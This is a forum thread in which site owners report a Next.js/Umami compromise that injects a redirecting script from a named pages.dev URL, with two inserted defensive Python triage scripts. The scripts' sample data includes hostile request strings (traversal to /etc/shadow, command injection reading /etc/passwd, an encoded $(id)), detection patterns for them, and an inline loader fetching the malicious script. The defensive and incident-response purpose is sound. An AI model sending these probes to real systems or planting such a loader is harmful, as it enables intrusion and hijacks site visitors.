3 months ago
It would appear that a malicious script has been injected into my app, potentially due to the recent Next.js security issue: https://station.railway.com/community/security-alert-react-next-js-remote-cod-2b0bab9d
The malicious script can be found here: https://static-6r1.pages.dev/min.js
I'm digging further into the issue, but looks like the source of the problem may be an outdated and vulnerable version of Umami which was installed via https://railway.com/new/template/umami-analytics about 7 months ago and last updated 1 month ago.
What prompted me to identify the issue was that the gambling site 8617kryy.com was being opened in a new tab from both my main site and the Umami dashboard.
They both seem to have been importing the malicious script https://static-6r1.pages.dev/min.js
Here are some further links:
https://www.reddit.com/r/nextjs/comments/1pm5ln8/i_was_hacked_help_me_understand_how/
https://github.com/umami-software/umami/issues/3852
https://github.com/vercel/next.js/discussions/87154
8 Replies
3 months ago
Here's the min.js file in case Cloudflare removes it from their pages.dev domain.
3 months ago
I'm starting to investigate the logs, and it looks like some pretty suspicious activity was occurring.
3 months ago
This thread has been marked as public for community involvement, as it does not contain any sensitive or personal information. Any further activity in this thread will be visible to everyone.
Status changed to Open brody • 3 months ago
3 months ago
Here's one of the logs; it looks like a malicious user is attempting to run commands.
3 months ago
I'm having trouble sharing the logs; some of the files can't be uploaded, presumably because they contain commands and are flagged by your firewall.
But essentially there were attempts made to scan the root directory and the etc/shadow directory at around 2025-12-10T13:23:00 on the Umami server.
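Since the poster could not upload the logs, here is an added example (my own code, not from this thread, Umami or Railway) of the kind of triage script that would surface the probes described above from a request log: it URL-decodes each request target (repeatedly, to unwrap double encoding), matches it against a few indicators (sensitive files such as /etc/shadow, `../` traversal, shell metacharacters, the reported malicious host), and tallies hits per client. The log format and the sample lines are constructed for the example; adapt `LINE_RE` to your own log layout.

```python
import re
from urllib.parse import unquote

# Constructed sample request log, loosely modelled on what the post describes
# (a burst of probes around 2025-12-10T13:23 on the Umami service).
# These are made-up lines, not the poster's real logs.
SAMPLE_LOG = """\
2025-12-10T13:22:41Z GET /api/websites 200 "Mozilla/5.0"
2025-12-10T13:23:02Z GET /..%2f..%2f..%2fetc/shadow 404 "curl/8.4.0"
2025-12-10T13:23:05Z GET /?cmd=cat%20/etc/passwd 200 "curl/8.4.0"
2025-12-10T13:23:09Z POST /api/send 200 "Mozilla/5.0"
2025-12-10T13:23:11Z GET /?x=%2524(id) 200 "python-requests/2.31"
2025-12-10T13:24:00Z GET /script.js 200 "Mozilla/5.0"
"""

# Assumed line layout: <timestamp> <method> <target> <status> "<user-agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Indicators are matched against the decoded, lower-cased request target.
INDICATORS = [
    ("sensitive-file", re.compile(r"/etc/(shadow|passwd)")),
    ("path-traversal", re.compile(r"\.\./")),
    ("shell-metachar", re.compile(r"[;|`]|\$\(")),
    ("known-bad-host", re.compile(r"static-6r1\.pages\.dev")),
]


def normalize_target(target):
    """URL-decode until stable (max 3 rounds) so %2524 -> %24 -> $ is caught."""
    cur = target
    for _ in range(3):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.lower()


def scan_log(text):
    """Return one finding per log line that matches at least one indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; in real triage, count these too
        target = normalize_target(m.group("target"))
        hits = [name for name, rx in INDICATORS if rx.search(target)]
        if hits:
            findings.append({
                "line": lineno,
                "ts": m.group("ts"),
                "ua": m.group("ua"),
                "target": target,
                "indicators": hits,
            })
    return findings


def count_by_client(findings):
    """Tally findings per user-agent to see which clients were probing."""
    counts = {}
    for f in findings:
        counts[f["ua"]] = counts.get(f["ua"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ua"], f["target"], ",".join(f["indicators"]))
    print(count_by_client(found))
```

Run against the real log this would give a timeline of the probing and the clients involved, which is what the reporter was trying to share; the decoded target is kept in each finding so the exact payload can be quoted in an incident write-up without re-running the scan.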
3 months ago
Hey Jowo,
I have the same issue on my website. An injected script is replacing my external links on the website and then redirecting to a casino website.
3 months ago
Script present: https://static-6r1.pages.dev/min.js
Server header: server: railway-edge
Edge identifier: x-railway-edge: railway/europe-west4-drams3a
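As an added example (my own code, not something from this thread or from Next.js/Umami), here is a quick static check for the symptom both posters describe: given the HTML your site actually serves, it lists every `<script src>` whose host is outside an allowlist and every URL inside inline scripts that points off-site, which is where a loader for `https://static-6r1.pages.dev/min.js` would show up. `SITE_HOST`, `ALLOWED_SCRIPT_HOSTS` and the sample HTML are assumptions constructed for the example; replace them with your own domain and the page body from `curl` or the browser's view-source.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party host and script allowlist; substitute your own.
SITE_HOST = "example.com"
ALLOWED_SCRIPT_HOSTS = {"example.com", "cdn.example.com"}

# Constructed page body for the example: a normal Next.js chunk, an allowed
# CDN script, the reported malicious script, and an inline loader for it.
SAMPLE_HTML = """\
<html><head>
<script src="/_next/static/chunks/main-app.js"></script>
<script src="https://cdn.example.com/analytics.js"></script>
<script src="https://static-6r1.pages.dev/min.js"></script>
<script>
var s = document.createElement("script");
s.src = "https://static-6r1.pages.dev/min.js";
document.head.appendChild(s);
</script>
</head><body><a href="https://example.org/partner">partner</a></body></html>
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


class ScriptCollector(HTMLParser):
    """Collects <script src> values and the text of inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True  # inline script: capture its body

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def _host_allowed(url, site_host, allowed):
    host = urlparse(url).hostname
    # Relative URLs such as /_next/static/... resolve to the site itself;
    # protocol-relative //host/x still yields a hostname and is checked.
    return (host or site_host) in (allowed | {site_host})


def audit_html(html, site_host=SITE_HOST, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return off-allowlist script sources and off-site URLs in inline scripts."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    foreign = [s for s in p.srcs if not _host_allowed(s, site_host, allowed)]
    inline_foreign = []
    for body in p.inline:
        for url in URL_RE.findall(body):
            if not _host_allowed(url, site_host, allowed):
                inline_foreign.append(url)
    return {"foreign_scripts": foreign, "inline_foreign_urls": inline_foreign}


if __name__ == "__main__":
    result = audit_html(SAMPLE_HTML)
    for src in result["foreign_scripts"]:
        print("off-allowlist script:", src)
    for url in result["inline_foreign_urls"]:
        print("off-site URL in inline script:", url)
```

One caveat: the link rewriting the second poster describes happens in the browser after min.js runs, so the served HTML still shows the original `href` values; this check finds the loader, not the rewritten anchors. To confirm the rewriting, compare the `href`s in a browser with JavaScript enabled against the ones in the raw HTML.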
3 months ago
Sorry to hear you're also encountering this issue. We're not alone; see the Reddit and GitHub links I posted above.
You should upgrade Next and React ASAP, and you should be able to resolve the issue.
see here: https://nextjs.org/blog/security-update-2025-12-11
I also took the extra precaution of rolling all of my app secrets in case they have been compromised, since this is a very serious vulnerability and I'm unsure at this point exactly what the scope of the breach is.
Additionally, I terminated the Umami analytics server/frontend/database for good measure, which was running alongside my main website.
And yeah, as mentioned, I updated Next and React and rolled my keys.
I also put my site into maintenance mode until I've managed to pick through the logs as best I can to figure out the extent of the breach.
3 months ago
Thanks, mate! My website is really simple, with just a couple of pages. I'm using Cloudflare, but only the free version, and there is nothing injected there. I'll have a look at the links and will upgrade Next.js. Thanks a lot!
